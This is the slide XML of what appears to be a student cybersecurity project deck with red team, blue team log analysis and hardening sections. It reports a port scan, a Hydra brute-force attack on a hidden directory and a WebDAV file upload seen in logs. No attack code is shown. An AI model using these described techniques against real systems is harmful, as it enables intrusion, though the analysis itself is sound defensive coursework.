          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3761300" y="835137"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1254" name="Google Shape;1254;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395275" y="3957650"/>
            <a:ext cx="8381400" cy="5541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Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>The port scan occurred between </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>4:31 PM Aug 7, 2021, 5:05 Aug 7, 2021</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>The normal values we expect to see are around 100, anything beyond the threshold we will look at.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1255" name="Google Shape;1255;p81"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="403775" y="1403300"/>
            <a:ext cx="8364406" cy="24709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59"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1260" name="Google Shape;1260;p8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ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Indications of a Port Scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1261" name="Google Shape;1261;p8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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1262" name="Google Shape;1262;p8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263" name="Google Shape;1263;p82"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="3581700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1264" name="Google Shape;1264;p82"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="101775" y="1516125"/>
            <a:ext cx="4517137" cy="2626033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1265" name="Google Shape;1265;p82"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4699475" y="1665855"/>
            <a:ext cx="4023358" cy="158252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69"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1270" name="Google Shape;1270;p8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Request for the Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1271" name="Google Shape;1271;p8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There were 16,568 attempts to access the hidden director /company_folders/secret_folder at 1755 and lasting for about 1 minute before a password was discovered</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1272" name="Google Shape;1272;p83"/>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273" name="Google Shape;1273;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="65299"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="276225" y="2985392"/>
            <a:ext cx="8591550" cy="1603024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1274" name="Google Shape;1274;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2537450" y="835125"/>
            <a:ext cx="4069074" cy="2150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78"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1279" name="Google Shape;1279;p84"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2551167" y="701700"/>
            <a:ext cx="4041648" cy="4086357"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1280" name="Google Shape;1280;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5313725" y="3692950"/>
            <a:ext cx="4262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68"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069" name="Google Shape;1069;p67"/>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Table of Contents</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1070" name="Google Shape;1070;p67"/>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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This document contains the following sections:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1071" name="Google Shape;1071;p67"/>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072" name="Google Shape;1072;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="137882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3" name="Google Shape;1073;p67"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1378813"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1074" name="Google Shape;1074;p67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="A9B7C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latin typeface="Roboto Thin"/>
                  <a:ea typeface="Roboto Thin"/>
                  <a:cs typeface="Roboto Thin"/>
                  <a:sym typeface="Roboto Thin"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr sz="3000">
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1075" name="Google Shape;1075;p67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="A9B7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6" name="Google Shape;1076;p67"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2228725"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1077" name="Google Shape;1077;p67"/>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02</a:t>
              </a:r>
              <a:endParaRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1078" name="Google Shape;1078;p67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>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9" name="Google Shape;1079;p67"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3073850"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1080" name="Google Shape;1080;p67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="3D85C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03</a:t>
              </a:r>
              <a:endParaRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1081" name="Google Shape;1081;p67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="3D85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2" name="Google Shape;1082;p67"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3923750"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1083" name="Google Shape;1083;p67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>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solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Thin"/>
                  <a:ea typeface="Roboto Thin"/>
                  <a:cs typeface="Roboto Thin"/>
                  <a:sym typeface="Roboto Thin"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1084" name="Google Shape;1084;p67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">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85" name="Google Shape;1085;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12450" y="137882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Network Topology</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086" name="Google Shape;1086;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="2231136"/>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67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="3073850"/>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67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="3918975"/>
            <a:ext cx="7517100" cy="621300"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>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67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12425" y="2233550"/>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Red Team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>: Security Assessment</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1090" name="Google Shape;1090;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="150" y="30762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Blue Team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>: Log Analysis and Attack Characterization</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1091" name="Google Shape;1091;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="3918975"/>
            <a:ext cx="9168600" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1554475" tIns="0" rIns="457200" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Hardening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>: Proposed Alarms and Mitigation Strategies</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="1285" name="Google Shape;1285;p85"/>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Uncovering the Brute Force Attack</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1286" name="Google Shape;1286;p85"/>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There were 16,568 attempts to access the hidden directory /company_folders/secret_folder at 1755 and lasting for about 1 minute before a password was discovered. Of interest is the “user_agent_original Mozilla/4.0 (Hydra)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1287" name="Google Shape;1287;p85"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="686100"/>
            <a:ext cx="5527493" cy="2167128"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1288" name="Google Shape;1288;p85"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4925850" y="2957478"/>
            <a:ext cx="3123370" cy="1758623"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1289" name="Google Shape;1289;p85"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1095843" y="2756925"/>
            <a:ext cx="1969611" cy="2159728"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1290" name="Google Shape;1290;p85"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5832293" y="686100"/>
            <a:ext cx="3159308" cy="180782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294"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1295" name="Google Shape;1295;p86"/>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Analysis: Finding the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1296" name="Google Shape;1296;p86"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="4114800" cy="1269600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="91425" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Answer the following questions in bullet points under the screenshot if space allows. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Otherwise, add the answers to speaker notes. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1297" name="Google Shape;1297;p86"/>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r>
              <a:rPr lang="en"/>
              <a:t>The webdav folder was called 32 times during this reporting period and a file was uploaded using a PUT request and executed using PROPFIND</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1298" name="Google Shape;1298;p86"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3663050" y="741300"/>
